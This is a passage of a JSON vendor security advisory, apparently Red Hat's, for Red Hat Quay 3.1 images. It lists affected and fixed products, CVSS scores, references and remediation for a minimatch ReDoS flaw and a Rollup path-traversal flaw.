"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
